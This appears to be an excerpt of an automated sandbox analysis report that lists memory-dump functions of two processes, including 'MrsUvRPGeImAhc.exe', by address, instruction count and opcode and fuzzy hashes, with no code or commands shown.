Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc5799ead8d87a3736999037117f731c625ae4d8730c5d7c83e361622ffae996
Instruction ID: fbbe436d47bea872dba87a953d7e95ccd85625f842c5048becca9c1a31337668
Opcode Fuzzy Hash: fc5799ead8d87a3736999037117f731c625ae4d8730c5d7c83e361622ffae996
Instruction Fuzzy Hash: DB017571A0956E8FE791EB2C84892B9BBE0FF9C704F6505B5E008C7093DD78A445CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E01D0 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0154f35b168408857b2f1e135e9a2536109657973381a5523935467b20262406
Instruction ID: 924c998b24947f3f6c83d8dbba4d58dc0d166d0f0cceef5624108a916d25330e
Opcode Fuzzy Hash: 0154f35b168408857b2f1e135e9a2536109657973381a5523935467b20262406
Instruction Fuzzy Hash: AA015E3094851E8FDB98EF28C4566BEB7E1EF5C715FA0417ED40EC2192CA35A591CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017EA6A5 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 144e5cd24853cf7629b91cc753bf3213930c0a71072973adb3ba7bcdea3dc2df
Instruction ID: 524d204d80edf953df4ca811798c3b61e84dd17ef4bfaacc155dc17158eb0350
Opcode Fuzzy Hash: 144e5cd24853cf7629b91cc753bf3213930c0a71072973adb3ba7bcdea3dc2df
Instruction Fuzzy Hash: 0801F730509B9E8FDB45DF6894562FA7FE0EF5A305F0001BAE40CC3092EA3655A5C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E27AD Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 782497a58c859e5bbbbb9d7003a45c5d197685828a8d272489fc7f778e6215ff
Instruction ID: f4cca9f219c1ead5643dcc26334db3119d9192b39bd755e2be17849ca4ccc67a
Opcode Fuzzy Hash: 782497a58c859e5bbbbb9d7003a45c5d197685828a8d272489fc7f778e6215ff
Instruction Fuzzy Hash: 5C017C3095C65E8FEB51EF2888481E9BBE4EF59701F4145BAE408C6093EF34E555C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E2E49 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ef07b0fa9e00d4aaba7379d60057a7f68769f152f95e207bfe1d3a1426a3040
Instruction ID: 641656ce432efd24a8c923e64971655438307d38a7c263c27e09000629a1429d
Opcode Fuzzy Hash: 8ef07b0fa9e00d4aaba7379d60057a7f68769f152f95e207bfe1d3a1426a3040
Instruction Fuzzy Hash: E401843180D6AD8FE752EB38844D1A97BE4EF5E700F5605F3D408CB0A3DA38A445C761

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017EA329 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02fee601684b600f2e4ba52317d58f15763e358c4b8157c5e1f701a2c06a41e7
Instruction ID: 2ecb1c03f4ec06e1cdd426a594b1937cc9f446de50605ad25b135f2159d51896
Opcode Fuzzy Hash: 02fee601684b600f2e4ba52317d58f15763e358c4b8157c5e1f701a2c06a41e7
Instruction Fuzzy Hash: 0B01713194D69E8FEB51EB3888591A9BBE0EF5A700F5508F6D408CB0A3ED68A445C721

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E08EF Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ca4a5ddbe86dcc87c9af2cb82b8bb3ff936715277ee88daf42cbe88e99738db
Instruction ID: eb467205d8d81cffecbd4fe768d1d6115ed4c73ae86c43d97125674cadf0ac77
Opcode Fuzzy Hash: 9ca4a5ddbe86dcc87c9af2cb82b8bb3ff936715277ee88daf42cbe88e99738db
Instruction Fuzzy Hash: 76018F62E0891D4EEF48EB6884996EDF7E1FF1C710F054179E00AD7093CE24A8468750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E0208 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5c37d27408400aa2639a72b0e7977159f76773db56a52980c74927987f2ca51
Instruction ID: 080370dc049e14769497374e3e273f16205d8e1baacabd9369a7a0e08ad528e2
Opcode Fuzzy Hash: b5c37d27408400aa2639a72b0e7977159f76773db56a52980c74927987f2ca51
Instruction Fuzzy Hash: 85016D3085861E8AEB58EB2884582BAB7E4FF1C705F50047EE40EC6192DF75A551C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E0200 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d5cbd2e358aa301a2be012549d6ed88d04ae26cc7b131220535e878824c75b7
Instruction ID: 87d8dee7e733342d9eabb3309973c0f454bcf5672622687f763c593e4b9c339e
Opcode Fuzzy Hash: 7d5cbd2e358aa301a2be012549d6ed88d04ae26cc7b131220535e878824c75b7
Instruction Fuzzy Hash: 9901813095852E8BEB58EF28C4596BAB7E4FF1C709F50047EE40EC21D2DF35A155CA10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017FA900 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95d78dcdf5d11d6721ecc721b98c41208f966fd04c66b48bcb96fe0a14fadadb
Instruction ID: 532589283a39ce3dc66ed2413bd5afcd96b840f30eb71515738bb32298ff29f2
Opcode Fuzzy Hash: 95d78dcdf5d11d6721ecc721b98c41208f966fd04c66b48bcb96fe0a14fadadb
Instruction Fuzzy Hash: F6011934D1892E8EEB80EB78844C6BAB7F4FF58705F014976D41DC3062EE34A194CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E0D30 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 166d2ef15b2641a1127bd727cb98eb2d6a85d792a7e9433231a077ddb687e652
Instruction ID: 111cef006b4a768a34e81b1c630bc1d26087cd73024288267de0f31805eca396
Opcode Fuzzy Hash: 166d2ef15b2641a1127bd727cb98eb2d6a85d792a7e9433231a077ddb687e652
Instruction Fuzzy Hash: 6CF0DC30A1852E8AEBA5EAAC98083FDB7E0EB59714F00013AE41CC20C2DAB52089C311

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E01C8 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e91e7364e08587b9d3c35286806723de4e17abe134e6dd5991a281589b950423
Instruction ID: 7fbe12453c6aa97163f4e3f4b3742430566db33d4ada956fa9675e8fdcd627bb
Opcode Fuzzy Hash: e91e7364e08587b9d3c35286806723de4e17abe134e6dd5991a281589b950423
Instruction Fuzzy Hash: CCF0F03084D61ECFEF98EF2894162FAB7E4EF09314F90003AE80DC2192CA35A491CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E184B Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ff37de31ea5aeac91c8a471d1d5a830da0e4d1ea30f95da7beae06bc91fccb5
Instruction ID: 291c5aa59f0eb4cd229a6183b56080aa54062f9449a483b3fb13bf9e29efa0e7
Opcode Fuzzy Hash: 8ff37de31ea5aeac91c8a471d1d5a830da0e4d1ea30f95da7beae06bc91fccb5
Instruction Fuzzy Hash: 0DF0CD3084C64E8EEB98DF2884462BABBE0EF59310F900039E80DC2182DA71A5A1C780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E26C9 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e75776605b41927943a6fdc574c8f4dd33d00ad0d56c68a4836ac0fdb815d51
Instruction ID: 052f5ef6865bf7c6aa2cceb95c96a1e249aaf0e8f5fa4370086f6f801ffe953d
Opcode Fuzzy Hash: 7e75776605b41927943a6fdc574c8f4dd33d00ad0d56c68a4836ac0fdb815d51
Instruction Fuzzy Hash: 06F0CD3184D39E8FEB6A9F2888291F97FE4FF0A214F4505BAE858C60D3DB389459C711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E273D Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.305564798.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ffc017e0000_chainsavesref.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c0e2d78e70b16e91195c3b67aa2853f08bdf410e7374dabbacd649088925faf
Instruction ID: ff571c9501aeaf309565fe231b20d9d82bbe98cb03186be8cad47a4ca1254144
Opcode Fuzzy Hash: 0c0e2d78e70b16e91195c3b67aa2853f08bdf410e7374dabbacd649088925faf
Instruction Fuzzy Hash: F5F0243085E78E8FEB98AF2888182B9BBE0FF09701F4004BEE908C20D3DB399451C711

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: MrsUvRPGeImAhc.exePID: 3432, Parent PID: 848COMMON

Executed Functions

Function 00007FFC017E354B Relevance: 3.9, Strings: 3, Instructions: 145COMMON

Download Yara Rule

Strings

jt\_, xrefs: 00007FFC017E3681
jt\_, xrefs: 00007FFC017E365E
jt\_, xrefs: 00007FFC017E363B

Memory Dump Source

Source File: 00000010.00000002.341209747.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffc017e0000_MrsUvRPGeImAhc.jbxd

Similarity

API ID:
String ID: jt\_$jt\_$jt\_
API String ID: 0-1201605121
Opcode ID: 9e4d182524e40dd3e6ceb158bb278f45962de551e335d04e806786adf603db9e
Instruction ID: d6027c4d7a8cc7eb2ffaa8a25a313a20bf6d147cee8739965ddc9863d0004460
Opcode Fuzzy Hash: 9e4d182524e40dd3e6ceb158bb278f45962de551e335d04e806786adf603db9e
Instruction Fuzzy Hash: F1418D7190C95E8FEB98EB68D8556BDBBE1FF19710F5401B9D00ED7293DE252802CB21

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E368E Relevance: 2.6, Strings: 2, Instructions: 132COMMON

Download Yara Rule

Strings

Zr\_, xrefs: 00007FFC017E3700
jt\_, xrefs: 00007FFC017E36A4

Memory Dump Source

Source File: 00000010.00000002.341209747.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffc017e0000_MrsUvRPGeImAhc.jbxd

Similarity

API ID:
String ID: Zr\_$jt\_
API String ID: 0-676687960
Opcode ID: a0e81b4a4ab0ae5972408f71c77c25bf8598c95d6b0edeaffd86cead341860af
Instruction ID: b240a1df02473563c5e1d422ded1ea14667e0678def333f2274fb36b77995509
Opcode Fuzzy Hash: a0e81b4a4ab0ae5972408f71c77c25bf8598c95d6b0edeaffd86cead341860af
Instruction Fuzzy Hash: A441E1B1A5C55D8EEB88CB6CE8553BD7BE1FB5A360F50027AC00DD3B86CAB61801CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E67BA Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

jt\_, xrefs: 00007FFC017E5CE9

Memory Dump Source

Source File: 00000010.00000002.341305478.00007FFC017E5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffc017e5000_MrsUvRPGeImAhc.jbxd

Similarity

API ID:
String ID: jt\_
API String ID: 0-3422377674
Opcode ID: 9652682d6b0e30ffac90a6e85d619fa8a65f2e0ce7e7250111cf0265aa1aee26
Instruction ID: 7f5baa9cb1d67a49117e73447e4fd7147650b9e99e48d78d2690eaaec1504b5c
Opcode Fuzzy Hash: 9652682d6b0e30ffac90a6e85d619fa8a65f2e0ce7e7250111cf0265aa1aee26
Instruction Fuzzy Hash: FA111C3190852E8FEB64DA08C8907F8B3F5EF59741F1042FAC40EE6282DA346AC5CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E5CDE Relevance: 1.3, Strings: 1, Instructions: 19COMMON

Download Yara Rule

Strings

jt\_, xrefs: 00007FFC017E5CE9

Memory Dump Source

Source File: 00000010.00000002.341305478.00007FFC017E5000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffc017e5000_MrsUvRPGeImAhc.jbxd

Similarity

API ID:
String ID: jt\_
API String ID: 0-3422377674
Opcode ID: 04558afc59396f5fbcc8d36d67b8c3b79a09a9492c2d2b2323fd66af6aa6f0c6
Instruction ID: c4934debeedbbe67f3571d91449a31d9576972cd756697c98769cca66e935ae0
Opcode Fuzzy Hash: 04558afc59396f5fbcc8d36d67b8c3b79a09a9492c2d2b2323fd66af6aa6f0c6
Instruction Fuzzy Hash: 6FE0EC71A4C91E8FDFA4DA1CD894AB9B7E5EB58711F1043F5C40DD2206D93159C28F40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F2B55 Relevance: .4, Instructions: 405COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.341576371.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffc017f1000_MrsUvRPGeImAhc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 672a43bf4ce4a28d0be1f001a3ecf1f85c89305fbbc7e0971093d1b78befcb9d
Instruction ID: c12dfc71670c53b481842542097efe003ee2c29f9a4307e9d93d9252fa551241
Opcode Fuzzy Hash: 672a43bf4ce4a28d0be1f001a3ecf1f85c89305fbbc7e0971093d1b78befcb9d
Instruction Fuzzy Hash: 2BC11D2390E1FA4BE706A72CB8561F9FB60DF4273171801FBD088CA1A7ED15998EC765

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017ECDD9 Relevance: .4, Instructions: 372COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.341383177.00007FFC017EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffc017ea000_MrsUvRPGeImAhc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb568a2c091f57aadb43de217149c79b8896b523c860222d4d80e88287b054e1
Instruction ID: 11e0943b29f581bd79cefe8e1bf68076597dc04a418dfb618577e3051afdb5f5
Opcode Fuzzy Hash: fb568a2c091f57aadb43de217149c79b8896b523c860222d4d80e88287b054e1
Instruction Fuzzy Hash: 71D12A71D1866D8FEB98DBA8C4947F8B7E1FF59700F1401BAD00EE3292CA346885CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E20B5 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.341209747.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffc017e0000_MrsUvRPGeImAhc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9dfac0c0b7bc9a5662066673ecf895230193eaeda5b104a20d07596027ddac5c
Instruction ID: e8bf0ed3bdd427d33bd042459d5f5d2d1dc371886f5dfbbdef42943a889c61b8
Opcode Fuzzy Hash: 9dfac0c0b7bc9a5662066673ecf895230193eaeda5b104a20d07596027ddac5c
Instruction Fuzzy Hash: 4E911235E0C66E8FEB59DB2888512B9B7E4EF4A700F0502BAD44DD71D3DE38A906C761

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E1278 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.341209747.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffc017e0000_MrsUvRPGeImAhc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a44ffdbdc7828eeb29294e7867360ea909a9ecfb136c79358d5f68754d37927
Instruction ID: e6ab9f36c52dc4750e38094334565f3238279aa06840829c38b05fb698b013d8
Opcode Fuzzy Hash: 7a44ffdbdc7828eeb29294e7867360ea909a9ecfb136c79358d5f68754d37927
Instruction Fuzzy Hash: 42810730A0CB9D8FDB48DE2C88565BAB7E1FF99714B5441BED44AC7297CE35A802C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F2EF5 Relevance: .2, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.341576371.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffc017f1000_MrsUvRPGeImAhc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c87a265c5cbc141f0b6df3b308c2f720c9facbb8b13a1c6bda2d32d2d96f43d
Instruction ID: 3854db90e2dd9bfd8192ff8f03c859f188f6bfac9dae0acfc3ce5665d4e42257
Opcode Fuzzy Hash: 5c87a265c5cbc141f0b6df3b308c2f720c9facbb8b13a1c6bda2d32d2d96f43d
Instruction Fuzzy Hash: 3891E770D1862D8EEBA4EB58C8547ADB7F1FF58701F5041BAD40DE3292DE34AA85CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017EC160 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.341383177.00007FFC017EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffc017ea000_MrsUvRPGeImAhc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adadba089d923096f8ec96ad2b0e36fca6cc900a531ae2777bb1f04bd24af008
Instruction ID: 0e6452e8348390596011397c8175e1d5c0895cf2cbd9a08643ff672de0893498
Opcode Fuzzy Hash: adadba089d923096f8ec96ad2b0e36fca6cc900a531ae2777bb1f04bd24af008
Instruction Fuzzy Hash: 0E51E727A4C56E86EB05BA6CF8461FDF7D4DF56731F00027BD14CC9093DE25648ACAA8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017EC0E8 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.341383177.00007FFC017EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffc017ea000_MrsUvRPGeImAhc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e6785d9cce570a0cfea8a5b4c16eb1e9ae34a4e9724f6857fa7cc8deec13456
Instruction ID: 0ce252dcb45eb85037970c23761ba62d1c60cb7dc015088150b11e6797f89b63
Opcode Fuzzy Hash: 5e6785d9cce570a0cfea8a5b4c16eb1e9ae34a4e9724f6857fa7cc8deec13456
Instruction Fuzzy Hash: A151C32794C52E8AEB057A7CF8461F9F7D4DF46B31F01027BE14CC9193EE15248ACAA8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017EC0F0 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.341383177.00007FFC017EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffc017ea000_MrsUvRPGeImAhc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c83c5880cb27bad9fe060858c9fe78d3d278d73aeff533d8ba9f3be47503abae
Instruction ID: 3914f8cd4d78a95f3b1224106f12348d807b77d2295cd148b54f994caecdf2be
Opcode Fuzzy Hash: c83c5880cb27bad9fe060858c9fe78d3d278d73aeff533d8ba9f3be47503abae
Instruction Fuzzy Hash: 0451C42794C52E8AEB057A7CF8461F9F7D4DF56B31F01027BE14CC9193EE15248ACAA8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E18BD Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.341209747.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffc017e0000_MrsUvRPGeImAhc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea197ef72a0d3816e2823d740a1c5fbd44c927df1576fb58a6ed9314c2221b80
Instruction ID: fb8cdc94389dbc550bea040a31bfc645c90ed43a6f459a375a84d9419e64dc0e
Opcode Fuzzy Hash: ea197ef72a0d3816e2823d740a1c5fbd44c927df1576fb58a6ed9314c2221b80
Instruction Fuzzy Hash: 7651C330A1CB9D8FDB48DE1C88655BAB7E2FF98714B54417ED44EC7286CE34A802C791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017ECF6D Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.341383177.00007FFC017EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffc017ea000_MrsUvRPGeImAhc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93749f7aec3d4113913efe7a713e72a26ab82d6c4bcf451dfe9a8e4379867e3e
Instruction ID: 34f5427f1141f7f48ddfd30001388245a300c90594eaf0718d8b58dcba49cb31
Opcode Fuzzy Hash: 93749f7aec3d4113913efe7a713e72a26ab82d6c4bcf451dfe9a8e4379867e3e
Instruction Fuzzy Hash: 2961C77191896DCFEB98EB98C894BF8B7E1FF59304F1401BAD00DE7292CA356881CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F4610 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.341576371.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffc017f1000_MrsUvRPGeImAhc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 000e2d23164fc30a88473d4693523d0105b26e384570c41825f2c28d5a56b5c1
Instruction ID: 16e7a9dc9cc98dbb17088361a0302bef5d26f7f629c3c47fc15564405e07c697
Opcode Fuzzy Hash: 000e2d23164fc30a88473d4693523d0105b26e384570c41825f2c28d5a56b5c1
Instruction Fuzzy Hash: AA51E870D0896D8FDF94EB6CC855AAAB7F1FF59711F50016ED00EE3296CA356881CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017E3165 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.341209747.00007FFC017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffc017e0000_MrsUvRPGeImAhc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05842810c54cb13413bba39be3df9a80563c9125cdc59233c26b5cc3c58a1a44
Instruction ID: 308149cf96505defb768c5070ced32285fb16ca17af9d439989ae2251f573b7d
Opcode Fuzzy Hash: 05842810c54cb13413bba39be3df9a80563c9125cdc59233c26b5cc3c58a1a44
Instruction Fuzzy Hash: 1A511770D0866E8FEB44EBA8C4956FDB7F5FF58701F00017AD009E7292DA38A946CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F2D83 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.341576371.00007FFC017F1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffc017f1000_MrsUvRPGeImAhc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848cd19c41e8f1a883d9d8e743190ea50a515ccc698267323bcf903db2b34fcf
Instruction ID: 90a2364a440eaa101a18463fd0b90be98fbe13e6a82c8aeebc8fc720d8e4e288
Opcode Fuzzy Hash: 848cd19c41e8f1a883d9d8e743190ea50a515ccc698267323bcf903db2b34fcf
Instruction Fuzzy Hash: D241EC2290D1BA4AE702F73CE8561FAFB60DF52724B1901B7D08CC9163ED19588AC765

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017EC168 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.341383177.00007FFC017EA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC017EA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffc017ea000_MrsUvRPGeImAhc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1051d5750489f4b8d7f23d5c28798c167dfe29fda36eb54e60ece6323f01522b
Instruction ID: 70cbe5fe739fc9b451529e8f0f198f7e5acdaa51077cd5d1ca6780f71b445d8f
Opcode Fuzzy Hash: 1051d5750489f4b8d7f23d5c28798c167dfe29fda36eb54e60ece6323f01522b
Instruction Fuzzy Hash: 89412A2694C57E86EB0A7ABCB8061FDF7D4DF4AB31F050277E44CC5093DE24248AC6A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFC017F1CFD Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

